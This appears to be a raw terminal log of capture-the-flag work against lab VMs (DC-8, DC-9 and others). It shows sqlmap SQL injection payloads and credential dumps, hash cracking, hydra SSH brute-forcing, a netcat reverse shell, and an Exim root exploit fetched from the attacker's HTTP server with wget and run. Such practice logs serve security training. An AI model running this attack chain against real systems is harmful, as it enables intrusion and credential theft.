┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:f3:3b:7c, IPv4: 192.168.43.157
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.43.1    3a:e9:6f:eb:62:78       (Unknown: locally administered)
192.168.43.88   08:00:27:a3:ed:7c       PCS Systemtechnik GmbH
192.168.43.153  ca:6e:5b:3c:62:0f       (Unknown: locally administered)

┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.43.88                                                          
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-12 15:39 CST
Nmap scan report for dc-8 (192.168.43.88)
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:A3:ED:7C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.43.88/ -e php,txt,html,htm -i 200

[20:57:02] Starting: 
[20:57:59] 200 -   33KB - /CHANGELOG.txt
[20:58:02] 200 -  769B  - /COPYRIGHT.txt
[20:58:24] 200 -    1KB - /install.php
[20:58:24] 200 -  868B  - /INSTALL.mysql.txt
[20:58:24] 200 -  842B  - /INSTALL.pgsql.txt
[20:58:24] 200 -    1KB - /install.php?profile=default
[20:58:24] 200 -    6KB - /INSTALL.txt
[20:58:27] 200 -    7KB - /LICENSE.txt
[20:58:30] 200 -    2KB - /MAINTAINERS.txt
[20:58:35] 200 -    2KB - /node
[20:58:44] 200 -    2KB - /README.txt
[20:58:45] 200 -  744B  - /robots.txt
[20:58:48] 200 -  715B  - /sites/all/modules/README.txt
[20:58:48] 200 -  545B  - /sites/all/themes/README.txt
[20:58:48] 200 -  129B  - /sites/all/libraries/README.txt
[20:58:48] 200 -    0B  - /sites/example.sites.php
[20:58:48] 200 -  431B  - /sites/README.txt
[20:58:55] 200 -    3KB - /UPGRADE.txt
[20:58:56] 200 -    2KB - /user
[20:58:56] 200 -    2KB - /user/
[20:58:56] 200 -    2KB - /user/login/
[20:58:58] 200 -  177B  - /views/ajax/autocomplete/user/a
[20:59:00] 200 -    2KB - /web.config
[20:59:03] 200 -   42B  - /xmlrpc.php

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.43.88/?nid=2 --batch   
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.11#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:00:01 /2026-01-12/
......
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=2 AND 6281=6281

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: nid=2 AND (SELECT 2777 FROM(SELECT COUNT(*),CONCAT(0x71717a6b71,(SELECT (ELT(2777=2777,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nid=2 AND (SELECT 1947 FROM (SELECT(SLEEP(5)))UZxb)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: nid=-6921 UNION ALL SELECT CONCAT(0x71717a6b71,0x645a5a425551534354454450646c59696655557456596e534e6d6579745764465442416764717553,0x7171787871)-- -
---
[16:00:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[16:00:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 25 times
[16:00:14] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.43.88'

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.43.88/?nid=2 --batch -D d7db --tables
Database: d7db                                                                                     
[88 tables]
+-----------------------------+
| block                       |
 .......
| users                       |
| users_roles                 |
|  |
+-----------------------------+

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.43.88/?nid=2 --batch -D d7db -T users --columns
Database: d7db                                                                                     
Table: users
[16 columns]
+------------------+------------------+
| Column           | Type             |
+------------------+------------------+
| data             | longblob         |
| language         | varchar(12)      |
| name             | varchar(60)      |
| status           | tinyint(4)       |
| access           | int(11)          |
| created          | int(11)          |
| init             | varchar(254)     |
| login            | int(11)          |
| mail             | varchar(254)     |
| pass             | varchar(128)     |
| picture          | int(11)          |
| signature        | varchar(255)     |
| signature_format | varchar(255)     |
| theme            | varchar(255)     |
| timezone         | varchar(32)      |
| uid              | int(10) unsigned |
+------------------+------------------+

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.43.88/?nid=2 --batch -D d7db -T users -C "name,pass" --dump
+--------+---------------------------------------------------------+
| name   | pass                                                    |
+--------+---------------------------------------------------------+
| admin  | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+--------+---------------------------------------------------------+
[16:17:09] [INFO] table 'd7db.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.43.88/dump/d7db/users.csv'
[16:17:09] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[16:17:09] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.43.88'

┌──(root㉿kali)-[~/localkali/testpayload/CD8]
└─# john --format=drupal7 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 

Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
turtle           (?)     
1g 0:00:00:00 DONE (2026-01-12 16:34) 1.785g/s 914.2p/s 914.2c/s 914.2C/s genesis..letmein
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(root㉿kali)-[~]
└─# nc -lp 1111          
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c "import pty;pty.spawn('/bin/bash');"
www-data@dc-8:/var/www/html$ find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount

www-data@dc-8:/var/www/html$ /usr/sbin/exim4 --version
/usr/sbin/exim4 --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September  9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
www-data@dc-8:/var/www/html$ 

┌──(root㉿kali)-[/var/www/html]
└─# searchsploit exim 
Exim 4.87 - 4.91 - Local Privilege Escalation  | linux/local/46996.sh
......

┌──(root㉿kali)-[~/localkali/testpayload/DC8]
└─# cp /usr/share/exploitdb/exploits/linux/local/46996.sh . #拷贝到当前目录

┌──(root㉿kali)-[~/localkali/testpayload/DC8]
└─# ls -l
总计 8
-rwxr-xr-x 1 root root 3552  1月12日 20:34 46996.sh
-rw-r--r-- 1 root root   56  1月12日 16:33 hash.txt

┌──(root㉿kali)-[~/localkali/testpayload/DC8]
└─# mv 46996.sh a.sh
┌──(root㉿kali)-[~/localkali/testpayload/DC8]
└─# ls -l
总计 8
-rwxr-xr-x 1 root root 3552  1月12日 20:34 a.sh
-rw-r--r-- 1 root root   56  1月12日 16:33 hash.txt

┌──(root㉿kali)-[~/localkali/testpayload/DC8]
└─# python3 -m http.server 8000                            
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.3.47 - - [12/Jan/2026 20:40:45] "GET /a.sh HTTP/1.1" 200 -

www-data@dc-8:/tmp$ wget http://192.168.3.48:8000/a.sh
wget http://192.168.3.48:8000/a.sh
--2026-01-12 22:40:45--  http://192.168.3.48:8000/a.sh
Connecting to 192.168.3.48:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [application/x-sh]
Saving to: 'a.sh'

a.sh                100%[===================>]   3.47K  --.-KB/s    in 0s      

2026-01-12 22:40:45 (367 MB/s) - 'a.sh' saved [3552/3552]

www-data@dc-8:/tmp$ ls -l
ls -l
total 4
-rw-r--r-- 1 www-data www-data 3552 Jan 12 22:34 a.sh

www-data@dc-8:/tmp$ chmod +x a.sh
chmod +x a.sh
www-data@dc-8:/tmp$ ./a.sh -m netcat
./a.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Mon, 12 Jan 2026 22:48:06 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1vfHL4-0000G7-8o
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)
cd /root
ls
flag.txt
cat flag.txt

Brilliant - you have succeeded!!!

888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888



Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.

┌──(root㉿kali)-[~/localkali/testpayload]
└─# arp-scan -l             
Interface: eth0, type: EN10MB, MAC: 00:0c:29:dc:17:7e, IPv4: 192.168.3.43
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.3.1     18:d9:8f:c8:68:38       Huawei Device Co., Ltd.
192.168.3.4     00:e0:4c:4d:2a:68       REALTEK SEMICONDUCTOR CORP.
192.168.3.5     b4:2e:99:cc:28:45       GIGA-BYTE TECHNOLOGY CO.,LTD.
192.168.3.45    08:00:27:95:4e:a9       PCS Systemtechnik GmbH

┌──(root㉿kali)-[~/localkali/testpayload]
└─# nmap -p- 192.168.3.45              
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 17:51 CST
Nmap scan report for 192.168.3.45
Host is up (0.00072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE    SERVICE
22/tcp filtered ssh
80/tcp open     http
MAC Address: 08:00:27:95:4E:A9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

┌──(root㉿kali)-[~/localkali/testpayload]
└─# dirsearch -u http://192.168.3.45/index.php
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/localkali/testpayload/reports/http_192.168.3.45/_index.php_26-01-10_17-58-52.txt

Target: http://192.168.3.45/

[17:58:52] Starting: index.php/
[17:58:53] 404 -  274B  - /index.php/%2e%2e//google.com

Task Completed

┌──(root㉿kali)-[~/localkali/testpayload]
└─# sqlmap -u http://192.168.3.45/results.php --data "search =1" --leve=5 --batch

┌──(root㉿kali)-[~/localkali/testpayload]
└─# sqlmap -u http://192.168.3.45/results.php --data "search=1"  --batch 
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:09:40 /2026-01-10/

[18:09:40] [INFO] testing connection to the target URL
[18:09:40] [INFO] testing if the target URL content is stable
[18:09:40] [INFO] target URL content is stable
[18:09:40] [INFO] testing if POST parameter 'search' is dynamic
[18:09:40] [WARNING] POST parameter 'search' does not appear to be dynamic
[18:09:40] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[18:09:40] [INFO] testing for SQL injection on POST parameter 'search'
[18:09:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:09:41] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:09:41] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:09:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:09:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[18:09:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:09:41] [INFO] testing 'Generic inline queries'
[18:09:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:09:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:09:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:09:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:10:01] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:10:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:10:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:10:01] [INFO] target URL appears to be UNION injectable with 6 columns
[18:10:01] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 6494 FROM (SELECT(SLEEP(5)))FPWe) AND 'ggNh'='ggNh

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x44615268716e726b6e4966415575447a42676848597962535a79756e45646241566547736e654f66,0x7170786271),NULL,NULL-- -
---
[18:10:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:10:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.45'

┌──(root㉿kali)-[~/localkali/testpayload]
└─ sqlmap -l a.txt --batch 
#运行结果上面一致

┌──(root㉿kali)-[~/localkali/testpayload]
└─ sqlmap -l a.txt --batch --dbs
[18:15:12] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

┌──(root㉿kali)-[~/localkali/testpayload]
└─ sqlmap -l a.txt --batch -D users --tables
[18:17:09] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |

┌──(root㉿kali)-[~/localkali/testpayload]
└─ sqlmap -l a.txt --batch -D users -T UserDetails --columns
[18:21:24] [INFO] fetching columns for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[6 columns]
+-----------+-----------------+
| Column    | Type            |
+-----------+-----------------+
| firstname | varchar(30)     |
| id        | int(6) unsigned |
| lastname  | varchar(30)     |
| password  | varchar(20)     |
| reg_date  | timestamp       |
| username  | varchar(30)     |
+-----------+-----------------+

┌──(root㉿kali)-[~/localkali/testpayload]
└─ sqlmap -l a.txt --batch -D users -T UserDetails -C "username,password" --dump

[18:23:53] [INFO] fetching entries of column(s) 'password,username' for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+-----------+---------------+
| username  | password      |
+-----------+---------------+
| marym     | 3kfs86sfd     |
| julied    | 468sfdfsd2    |
| fredf     | 4sfd87sfd1    |
| barneyr   | RocksOff      |
| tomc      | TC&TheBoyz    |
| jerrym    | B8m#48sd      |
| wilmaf    | Pebbles       |
| bettyr    | BamBam01      |
| chandlerb | UrAG0D!       |
| joeyt     | Passw0rd      |
| rachelg   | yN72#dsd      |
| rossg     | ILoveRachel   |
| monicag   | 3248dsds7s    |
| phoebeb   | smellycats    |
| scoots    | YR3BVxxxw87   |
| janitor   | Ilovepeepee   |
| janitor2  | Hawaii-Five-0 |
+-----------+---------------+

[18:23:53] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.3.45/dump/users/UserDetails.csv'
[18:23:53] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-01102026_0623pm.csv'

┌──(root㉿kali)-[~/localkali/testpayload]
└─ cat /root/.local/share/sqlmap/output/192.168.3.45/dump/users/UserDetails.csv | awk -F, '{print $1}' > user.txt

┌──(root㉿kali)-[~/localkali/testpayload]
└─cat /root/.local/share/sqlmap/output/192.168.3.45/dump/users/UserDetails.csv | awk -F, '{print $2}' > pass.txt

┌──(root㉿kali)-[~/localkali/testpayload]
└─# cat user.txt                                                                                                  
username
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2

┌──(root㉿kali)-[~/localkali/testpayload]
└─# sqlmap -l a.txt -D Staff --tables --batch
[18:30:11] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+

┌──(root㉿kali)-[~/localkali/testpayload]
└─# sqlmap -l a.txt -D Staff -T Users --columns --batch 
[18:31:46] [INFO] fetching columns for table 'Users' in database 'Staff'
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column   | Type            |
+----------+-----------------+
| Password | varchar(255)    |
| UserID   | int(6) unsigned |
| Username | varchar(255)    |
+----------+-----------------+

┌──(root㉿kali)-[~/localkali/testpayload]
└─# sqlmap -l a.txt --batch -D Staff -T Users -C "Username,Password" --dump 
Database: Staff
Table: Users
[1 entry]
+----------+----------------------------------+
| Username | Password                         |
+----------+----------------------------------+
| admin    | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+

┌──(root㉿kali)-[~/localkali/testpayload]
└─# cat b.txt|egrep '[a-zA-Z]+' -o|sort|uniq  
...
kdevtmpfs
key
khugepaged
khungtaskd
kintegrityd
knockd #注意这个服务
ksmd
ksoftirqd
kstrp
kswapd
kthreadd
kthrotld
ktime
kworker
latency
...

┌──(root㉿kali)-[~/localkali/testpayload]
└─# nmap -p 22 192.168.3.45            
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 19:09 CST
Nmap scan report for 192.168.3.45
Host is up (0.00048s latency).

PORT   STATE    SERVICE
22/tcp filtered ssh
MAC Address: 08:00:27:95:4E:A9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

┌──(root㉿kali)-[~/localkali/testpayload]
└─# 7469,8475,9842         
7469,8475,9842：未找到命令

┌──(root㉿kali)-[~/localkali/testpayload]
└─# nc 192.168.3.45 7469                                                    
(UNKNOWN) [192.168.3.45] 7469 (?) : Connection refused

┌──(root㉿kali)-[~/localkali/testpayload]
└─# nc 192.168.3.45 8475
(UNKNOWN) [192.168.3.45] 8475 (?) : Connection refused

┌──(root㉿kali)-[~/localkali/testpayload]
└─# nc 192.168.3.45 9842
(UNKNOWN) [192.168.3.45] 9842 (?) : Connection refused

┌──(root㉿kali)-[~/localkali/testpayload]
└─# nmap -p 22 192.168.3.45
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 19:10 CST
Nmap scan report for 192.168.3.45
Host is up (0.00057s latency).

PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 08:00:27:95:4E:A9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds

┌──(root㉿kali)-[~/localkali/testpayload]
└─# hydra -L user.txt -P pass.txt ssh://192.168.3.45 -t 4

[STATUS] 80.00 tries/min, 80 tries in 00:01h, 281 to do in 00:04h, 4 active
[22][ssh] host: 192.168.3.45   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.3.45   login: joeyt   password: Passw0rd
[STATUS] 91.33 tries/min, 274 tries in 00:03h, 87 to do in 00:01h, 4 active
[22][ssh] host: 192.168.3.45   login: janitor   password: Ilovepeepee
[STATUS] 89.50 tries/min, 358 tries in 00:04h, 3 to do in 00:01h, 4 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-10 19:25:08

chandlerb@dc-9:~$ ls -al
total 12
drwx------  3 chandlerb chandlerb 4096 Jan 10 21:23 .
drwxr-xr-x 19 root      root      4096 Dec 29  2019 ..
lrwxrwxrwx  1 chandlerb chandlerb    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 chandlerb chandlerb 4096 Jan 10 21:23 .gnupg
chandlerb@dc-9:~$ history
    1  ls -al
    2  history
chandlerb@dc-9:~$ cd .gnupg/
chandlerb@dc-9:~/.gnupg$ ls -l
total 4
drwx------ 2 chandlerb chandlerb 4096 Jan 10 21:23 private-keys-v1.d
chandlerb@dc-9:~/.gnupg$ cd private-keys-v1.d/
chandlerb@dc-9:~/.gnupg/private-keys-v1.d$ ls -l
total 0
chandlerb@dc-9:~/.gnupg/private-keys-v1.d$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for chandlerb: 
Sorry, user chandlerb may not run sudo on dc-9.

┌──(root㉿kali)-[~/localkali/testpayload]
└─# hydra -L user.txt -P pass.txt ssh://192.168.3.45 -t 64
[22][ssh] host: 192.168.3.45   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.3.45   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.3.45   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.3.45   login: janitor   password: Ilovepeepee

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

nmap -A -T4 -p- 192.168.43.13 # 全开扫描+版本+系统+脚本探测

nmap -T4 -sS -sV -sC -O 192.168.3.17

┌──(root㉿kali-linux)-[~/…/work/exam/ctf/game-of-thrones]
└─# nmap -sV -p80,21-22,53,5432,1337,10000 -T4 -A -oG namp1_game.txt 192.168.3.17
Starting Nmap 7.93 ( https://nmap.org ) at 2025-12-23 21:11 CST
Nmap scan report for 192.168.3.17
Host is up (0.0020s latency).

PORT      STATE SERVICE    VERSION
21/tcp    open  ftp        Pure-FTPd
22/tcp    open  ssh        Linksys WRT45G modified dropbear sshd (protocol 2.0)
| ssh-hostkey: 
|   2048 e65bd7786b864f9b35409fc71fdd0d9f (RSA)
|   256 b8e330882eba56f249b0cc35c7cc4806 (ECDSA)
|_  256 a9f2d8eef09349d81904ffad89eedf7d (ED25519)
53/tcp    open  domain     (unknown banner: Bind)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|     bind
|_    Bind
| dns-nsid: 
|_  bind.version: Bind
80/tcp    open  http       Apache httpd
|_http-server-header: Apache
| http-robots.txt: 2 disallowed entries 
|_/secret-island/ /direct-access-to-kings-landing/
|_http-title: Game of Thrones CTF
1337/tcp  open  http       nginx
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Welcome to Casterly Rock
|_http-title: 401 Authorization Required
5432/tcp  open  postgresql PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.19
10000/tcp open  http       MiniServ 1.590 (Webmin httpd)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Login to Stormlands
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.93%I=7%D=12/23%Time=694A9517%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\
SF:x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04Bind\xc0\x0c
SF:\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
MAC Address: 08:00:27:44:26:17 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Device: router

TRACEROUTE
HOP RTT     ADDRESS
1   1.98 ms 192.168.3.17

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.65 seconds

~  nmap -sVC -p- 192.168.3.51                         
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-24 19:45 CST
Nmap scan report for 192.168.3.51
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.3.48
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 0        0              20 Jan 22 12:27 readme.txt
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:43:B0:88 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

☁  ~  lftp 192.168.3.51
lftp 192.168.3.51:~> user ftp
密码: 
lftp ftp@192.168.3.51:~> user ftp
密码: 
lftp ftp@192.168.3.51:~> ls -la
dr-xr-xr-x    2 0        0            4096 Jan 22 12:27 .
dr-xr-xr-x    2 0        0            4096 Jan 22 12:27 ..
-r--r--r--    1 0        0              20 Jan 22 12:27 readme.txt
lftp ftp@192.168.3.51:/> cat readme.txt 
http://tmpfile.dsz/
20 bytes transferred

☁  ~  dirsearch -u http://tmpfile.dsz/                                 
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_tmpfile.dsz/__26-01-24_20-06-21.txt

Target: http://tmpfile.dsz/

[20:06:21] Starting: 
[20:06:24] 403 -  276B  - /.ht_wsr.txt
[20:06:24] 403 -  276B  - /.htaccess.bak1
[20:06:24] 403 -  276B  - /.htaccess.orig
[20:06:24] 403 -  276B  - /.htaccess.sample
